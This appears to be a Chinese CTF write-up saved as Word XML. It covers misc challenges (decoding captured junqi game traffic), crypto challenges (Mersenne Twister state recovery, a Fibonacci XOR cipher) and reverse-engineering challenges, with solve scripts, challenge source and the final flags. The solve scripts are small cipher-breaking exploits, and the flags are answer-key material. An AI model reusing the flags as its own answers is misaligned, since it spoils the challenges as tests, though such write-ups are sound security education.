        </w:rPr>
        <w:t xml:space="preserve"> SwitchEnd，阵型，座位号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统计棋子数量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52975" cy="39624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军棋一行 5 个棋子，其中大本营一定是军旗，可以确定 01 是 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0A 0B 0C 有3个，对应最小的棋子，连 排 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 特殊，同样是3个棋子，雷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 05 只有1个，按照子力大小排，是 司 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04 - 0C 分别对应 司军师旅团营连排兵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 只有2个，对应 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加上行营，打印layout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Layout=[bytes.fromhex(x) for x in '''0a0c050a080803090b0a09040c030c07020206070b0b020106</w:t>
              <w:br/>
              <w:t>060c040b09070a0a08060c0b030a03050708020c0201020b09</w:t>
              <w:br/>
              <w:t>04040404040404040404040404040404040404040404040104</w:t>
              <w:br/>
              <w:t>0405080c06090a030c0a0b070a09030c020207060b0b020108'''.split()]</w:t>
              <w:br/>
              <w:br/>
              <w:t>C = "空旗雷炸司军师旅团营连排兵"</w:t>
              <w:br/>
              <w:br/>
              <w:t>for l in Layout:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    count = 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pos = 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while(count &lt; 25):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if(pos % 5 == 0):</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if(pos in [6,8,12,16,18]):</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print("〇",end='')</w:t>
              <w:br/>
              <w:t xml:space="preserve">            pos += 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">            continue</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(C[l[count]],end='')</w:t>
              <w:br/>
              <w:t xml:space="preserve">        count += 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">        pos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接下来确定玩家位置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玩家顺序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95475" cy="50673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布阵顺序对应 0 2 1 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可知 Jack布阵0 , King布阵2, Queen布阵1, Joker布阵3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PLAYER_JACK='''</w:t>
              <w:br/>
              <w:t>司军团兵师</w:t>
              <w:br/>
              <w:t>营〇连〇炸</w:t>
              <w:br/>
              <w:t>兵连〇排旅</w:t>
              <w:br/>
              <w:t>连〇营〇炸</w:t>
              <w:br/>
              <w:t>兵雷雷旅师</w:t>
              <w:br/>
              <w:t>排排雷旗团</w:t>
              <w:br/>
              <w:t>'''</w:t>
              <w:br/>
              <w:br/>
              <w:t>PLAYER_QUEEN='''</w:t>
              <w:br/>
              <w:t>连兵军连团</w:t>
              <w:br/>
              <w:t>团〇炸〇营</w:t>
              <w:br/>
              <w:t>排连〇营司</w:t>
              <w:br/>
              <w:t>兵〇炸〇兵</w:t>
              <w:br/>
              <w:t>旅雷雷师旅</w:t>
              <w:br/>
              <w:t>排排雷旗师</w:t>
              <w:br/>
              <w:t>'''</w:t>
              <w:br/>
              <w:br/>
              <w:t>PLAYER_KING='''</w:t>
              <w:br/>
              <w:t>师兵司排营</w:t>
              <w:br/>
              <w:t>旅〇连〇连</w:t>
              <w:br/>
              <w:t>团师〇兵排</w:t>
              <w:br/>
              <w:t>炸〇连〇炸</w:t>
              <w:br/>
              <w:t>军旅团雷兵</w:t>
              <w:br/>
              <w:t>雷旗雷排营</w:t>
              <w:br/>
              <w:t>'''</w:t>
              <w:br/>
              <w:br/>
              <w:t>PLAYER_JOKER='''</w:t>
              <w:br/>
              <w:t>司司司司司</w:t>
              <w:br/>
              <w:t>司〇司〇司</w:t>
              <w:br/>
              <w:t>司司〇司司</w:t>
              <w:br/>
              <w:t>司〇司〇司</w:t>
              <w:br/>
              <w:t>司司司司司</w:t>
              <w:br/>
              <w:t>司司司旗司</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'''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找到聊天记录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数之前的 MoveQz 数量即可（只统计服务器发送）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问题5：第1次发言内容，和此时的游戏步数</w:t>
              <w:br/>
              <w:t>NUMBER1 = 26</w:t>
              <w:br/>
              <w:t>MSG1 = "My Neuro is CUTTTE!!!"</w:t>
              <w:br/>
              <w:br/>
              <w:t># 问题6：第2次发言内容，和此时的游戏步数</w:t>
              <w:br/>
              <w:t>NUMBER2 = 42</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MSG2 = "You Should watch twitch.tv/vedal987 to cure your depression"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ctfshow{ICatchYouCheatingAll40InYourLayoutByPacketCapture!FR1Ck}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CRYPTO 部分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crypto1 月月的爱情故事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月月的爱情故事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mumu666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无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100分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[月月的爱情故事.pdf]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crypto2 麻辣兔头又一锅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麻辣兔头又一锅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萌新阿狸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听说有人不喜欢短尾巴的兔兔？肿么可能？我也很疑惑呢。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200分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import gmpy2 </w:t>
              <w:br/>
              <w:t>with open('z:/flag.txt','r') as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    txt = f.readlines()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    c = eval(f'[{txt[0]}],[{txt[1]}]')</w:t>
              <w:br/>
              <w:t>for i in range(len(c1)):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print(chr((gmpy2.fib(c[0][i])^gmpy2.fib(c[1][i]))&amp;0xff),end='' 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最终flag ctfshow{6d83b2f1-1241-4b25-9c1c-0a4c218f6c5f}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crypto3 NOeasyRSA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NOeasyRSA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mumu666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Can you find a and b?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200分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[NOeasyRSA.pdf]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crypto4 sign_rand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sign_rand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lingfeng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无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300分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类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>黑盒测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击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!/usr/bin/env python3.10</w:t>
              <w:br/>
              <w:t># -*- coding: utf-8 -*-</w:t>
              <w:br/>
              <w:t># @File    : exp.py</w:t>
              <w:br/>
              <w:t>from Crypto.Util.number import *</w:t>
              <w:br/>
              <w:t>from hashlib import md5</w:t>
              <w:br/>
              <w:t>from sage.all import *</w:t>
              <w:br/>
              <w:t>from random import Random</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>def buildT():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    rng = Random()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    T = matrix(GF(2), 32, 32)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for i in range(32):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        s = [0] * 624</w:t>
              <w:br/>
              <w:t xml:space="preserve">        s[0] = 1 &lt;&lt; (31 - i)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        rng.setstate((3, tuple(s + [0]), None))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        tmp = rng.getrandbits(32)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        row = vector(GF(2), [int(x) for x in bin(tmp)[2:].zfill(32)])</w:t>
              <w:br/>
              <w:t xml:space="preserve">        T[i] = row</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return T</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>def get_key(key1):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    T = buildT()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    a = [int(i) for i in bin(key1)[2:].zfill(32)]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    a = matrix(GF(2), a)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    b = T.solve_left(a)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    c = ''.join([str(i) for i in b.list()])</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return (int(c, 2))</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">gift, enc = </w:t>
              <w:br/>
              <w:br/>
              <w:t># kbits = gift[0][1].bit_length()</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>def inv_sbox(s_box):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    inv = []</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for i in range(max(s_box)):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if i in s_box:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            inv.append(s_box.index(i))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            inv.append('?')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return inv</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>def dec_flag(enc, key):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    key = bytes_to_long(md5(long_to_bytes(key)).digest())</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dec = enc ^ key</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return long_to_bytes(dec)</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>s_box = inv_sbox(gift[1])</w:t>
              <w:br/>
              <w:t>data = gift[0][(s_box[gift[2] // 2])]</w:t>
              <w:br/>
              <w:br/>
              <w:t>key1 = (data &amp; 0xffffffff)</w:t>
              <w:br/>
              <w:t>key = get_key(key1)</w:t>
              <w:br/>
              <w:t>print(dec_flag(enc, key))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># flag=b'ctfshow{F2AD971D-66C2-2D1D-69D6-CE7DE2A49B35}'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crypto5 哪位师傅知道这个是什么密码啊？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哪位师傅知道这个是什么密码啊？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春哥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为什么我运行了加密不出结果啊？为什么啊？啊？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400分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sys</w:t>
              <w:br/>
              <w:t>from Crypto.Util.number import *</w:t>
              <w:br/>
              <w:br/>
              <w:t>def pr(x):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sys.stdout.write(f'{x}\n')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sys.stdout.flush()</w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_factorial_list(p):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    factorial_list = [1] * p</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for i in range(1, p):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        factorial_list[i] = factorial_list[i-1] * i % p</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return factorial_list</w:t>
              <w:br/>
              <w:br/>
              <w:t>def G(x, y, p, factorial_list):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    x1, x2 = x // p, x % p</w:t>
              <w:br/>
              <w:t xml:space="preserve">    y1, y2 = y // p, y % p</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # print(f'{x = }, {y = }')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # print(f'{x2 = }, {y2 = }')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (x2 &lt; y2):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cur_G = 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cur_G = factorial_list[x2] * inverse(factorial_list[y2], p) * inverse(factorial_list[x2-y2], p) % p</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # print(f'{cur_G = }')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (x1 == 0) and (y1 == 0):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return cur_G</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return G(x1, y1, p, factorial_list) * cur_G % p</w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_keys(n: int):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    p = getPrime(-11+45-14)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    factorial_list = get_factorial_list(p)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pr('Please wait...')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s_list, t_list, u_list = [], [], []</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for i in range(n):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        pr(f'Progress: {i+1} / {n}')</w:t>
              <w:br/>
              <w:t xml:space="preserve">        while True:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            t, s = sorted(getPrime(101) for _ in 'NB')</w:t>
              <w:br/>
              <w:t xml:space="preserve">            u = G(s, t, p, factorial_list) &amp; 0xFF</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (u != 0):</w:t>
              <w:br/>
              <w:t xml:space="preserve">                s_list.append(s)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                t_list.append(t)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                u_list.append(u)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                break</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return (s_list, t_list, p), u_list </w:t>
              <w:br/>
              <w:br/>
              <w:t>FLAG = os.getenv('FLAG', 'ctfshow{never_gonna_give_you_flag}')</w:t>
              <w:br/>
              <w:t>pubkey, privkey = get_keys(len(FLAG))</w:t>
              <w:br/>
              <w:t>ciphertext = bytes(x ^ k for x, k in zip(FLAG.encode(), privkey))</w:t>
              <w:br/>
              <w:t>pr(f'{pubkey = }')</w:t>
              <w:br/>
              <w:t>pr(f'{ciphertext.hex() = }')</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t># def test(n, m, p):</w:t>
              <w:br/>
              <w:t>#     factorial_list = [1] * (n+1)</w:t>
              <w:br/>
              <w:t>#     pow_list = [0] * (n+1)</w:t>
              <w:br/>
              <w:t>#     for i in range(1, n+1):</w:t>
              <w:br/>
              <w:t>#         cur_pow = 0</w:t>
              <w:br/>
              <w:t>#         t = i</w:t>
              <w:br/>
              <w:t>#         while (t % p == 0):</w:t>
              <w:br/>
              <w:t>#             cur_pow += 1</w:t>
              <w:br/>
              <w:t>#             t //= p</w:t>
              <w:br/>
              <w:t>#         factorial_list[i] = factorial_list[i-1] * t % p</w:t>
              <w:br/>
              <w:t>#         pow_list[i] = pow_list[i-1] + cur_pow</w:t>
              <w:br/>
              <w:br/>
              <w:t>#     if (pow_list[n] &gt; pow_list[m] + pow_list[n-m]):</w:t>
              <w:br/>
              <w:t>#         print(f'{pow_list[n] = }')</w:t>
              <w:br/>
              <w:t>#         print(f'{pow_list[m] = }')</w:t>
              <w:br/>
              <w:t>#         print(f'{pow_list[n-m] = }')</w:t>
              <w:br/>
              <w:t>#         return 0</w:t>
              <w:br/>
              <w:t>#     else:</w:t>
              <w:br/>
              <w:t>#         return (factorial_list[n] * inverse(factorial_list[m], p) * inverse(factorial_list[n-m], p) % p)</w:t>
              <w:br/>
              <w:br/>
              <w:t># p = getPrime(7)</w:t>
              <w:br/>
              <w:t># n = getPrime(20)</w:t>
              <w:br/>
              <w:t># m = getPrime(19)</w:t>
              <w:br/>
              <w:t># if (n &lt; m):</w:t>
              <w:br/>
              <w:t>#     n, m = m, n</w:t>
              <w:br/>
              <w:t># c = test(n, m, p)</w:t>
              <w:br/>
              <w:t># print(f'{n = }, {m = }, {p = }')</w:t>
              <w:br/>
              <w:t># print(f'{c = }')</w:t>
              <w:br/>
              <w:t># factorial_list = get_factorial_list(p)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># print(f'{G(n, m, p, factorial_list) = }')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RE 部分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re1 re_signin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re_signin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h1xa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最简单的签单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100分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最终flag ctfshow{happy_2024_jiayou_a}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exp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#include &lt;stdio.h&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;stdlib.h&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;string.h&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>#define KEY 2024</w:t>
              <w:br/>
              <w:t>#define CTFSHOW2024 0x36D</w:t>
              <w:br/>
              <w:br/>
              <w:t>unsigned int generate_key(unsigned int s) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  s = s * 0x5bd1e995 + 0x12345678;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return (s &gt;&gt; 16) &amp; 0xffff;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>void decrypt(unsigned char *plaintext, unsigned char *ciphertext, unsigned int key1, unsigned int key2) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  unsigned int sum = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  int i;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  for (i = 0; i &lt; 128; i++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if(ciphertext[i]==0){</w:t>
              <w:br/>
              <w:t xml:space="preserve">      continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sum += key1;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sum += key2;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    plaintext[i] = ciphertext[i]  - sum;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sum = (sum &gt;&gt; 4) ^ ciphertext[i];</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>int main() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  unsigned char plaintext[128]={0};</w:t>
              <w:br/>
              <w:t xml:space="preserve">  unsigned char ciphertext[128]={0};</w:t>
              <w:br/>
              <w:t xml:space="preserve">  unsigned int number;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  unsigned char code[] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x9c, 0xcc, 0x88, 0x76, 0xd7, 0x89, 0x78, 0xec, 0x7c, 0xd7, 0x89, 0x71, 0xe3, 0x6d, 0x98, 0x17,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x94, 0x0f, 0xca, 0x9f, 0x7e, 0xd9, 0xa0, 0x8a, 0x79, 0xd1, 0x80, 0x77, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  };</w:t>
              <w:br/>
              <w:t xml:space="preserve">  number = generate_key(CTFSHOW2024);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  decrypt(plaintext, code, KEY, number);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  printf("%s",plaintext);</w:t>
              <w:br/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 xml:space="preserve">re2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>cpp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题目名称  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cpp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ThTsOd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300分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Let's meet the Chinese Program Language.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最终flag ctfshow{Oh!Y0uUndEr5t4nD7he14nguaGeN0W!}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题目代码，如果算的话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#包括 &lt;芯片组&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;cstdlib&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;字符串&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;细绳&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;切尔诺&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;输出流&gt;</w:t>
              <w:br/>
              <w:t>#包括 &lt;向量&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>类型定义 无符号短整型 相同;</w:t>
              <w:br/>
              <w:br/>
              <w:t>#定义 萬 * 10000 +</w:t>
              <w:br/>
              <w:t>#定义 仟 * 1000 +</w:t>
              <w:br/>
              <w:t>#定义 佰 * 100 +</w:t>
              <w:br/>
              <w:t>#定义 拾 * 10 +</w:t>
              <w:br/>
              <w:br/>
              <w:t>#定义 壹 1</w:t>
              <w:br/>
              <w:t>#定义 贰 2</w:t>
              <w:br/>
              <w:t>#定义 叁 3</w:t>
              <w:br/>
              <w:t>#定义 肆 4</w:t>
              <w:br/>
              <w:t>#定义 伍 5</w:t>
              <w:br/>
              <w:t>#定义 陆 6</w:t>
              <w:br/>
              <w:t>#定义 柒 7</w:t>
              <w:br/>
              <w:t>#定义 捌 8</w:t>
              <w:br/>
              <w:t>#定义 玖 9</w:t>
              <w:br/>
              <w:t>#定义 零 0</w:t>
              <w:br/>
              <w:br/>
              <w:t>结构群</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    相同 和平, 爱, 邮件[65536];</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>使用命名空间 标准；</w:t>
              <w:br/>
              <w:br/>
              <w:t>班级 超级加密</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t>私人的:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    一群 健身袋;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    细绳 钥匙;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    相同 超数;</w:t>
              <w:br/>
              <w:br/>
              <w:t>民众：</w:t>
              <w:br/>
              <w:t xml:space="preserve">    空白 煤气灯(常量 字符 *神经, 相同 邪恶的)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        这-&gt;钥匙 = 细绳(神经);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        这-&gt;超数 = 邪恶的;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    空白 加密A计划(向量&lt;相同&gt; &amp;清楚的)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        整数 长度 = 钥匙.长度();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        整数 我, 你, 他, 她;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        相同 *邮件;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        健身袋.和平 = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        健身袋.爱 = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        邮件 = 健身袋.邮件;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        为了 (我 = 0; 我 &lt; 65536; 我++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            邮件[我] = 我;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        你 = 他 = 0;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        为了 (我 = 0; 我 &lt; 65536; 我++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            她 = 邮件[我];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            你 = (相同)(你 + 她 + 钥匙[他]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            邮件[我] = 邮件[你];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            邮件[你] = 她;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            如果 (++他 &gt;= 长度)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                他 = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    空白 加密B计划(向量&lt;相同&gt; &amp;清楚的)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        整数 我, 和平, 爱, 她, 它;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        相同 *邮件;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        和平 = 健身袋.和平;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        爱 = 健身袋.爱;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        邮件 = 健身袋.邮件;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        尺寸_t 长度 = 清楚的.尺寸();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        为了 (我 = 0; 我 &lt; 长度; 我++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            和平 = (相同)(和平 + 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            她 = 邮件[和平];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            爱 = (相同)(爱 + 她);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            邮件[和平] = 它 = 邮件[爱];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            邮件[爱] = 她;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            清楚的.在(我) += 邮件[(相同)(她 + 它)];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        健身袋.和平 = 和平;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        健身袋.爱 = 爱;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    空白 加密C计划(向量&lt;相同&gt; &amp;清楚的)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        尺寸_t 长度 = 清楚的.尺寸();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        为了 (整数 我 = 0; 我 &lt; 长度; 我++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            相同 资源 = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            相同 她 = 清楚的.在(我);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            相同 它 = 这-&gt;超数;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            尽管 (它)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                如果 (它 &amp; 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    资源 = (资源 + 她);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                她 = (她 + 她);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                它 = 它 / 2;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            清楚的.在(我) = 资源;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>常量 相同 回答[] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 叁 仟 陆 佰 陆 拾 捌,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 肆 仟 陆 佰 肆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    贰 萬 柒 仟 捌 佰 贰 拾 叁,</w:t>
              <w:br/>
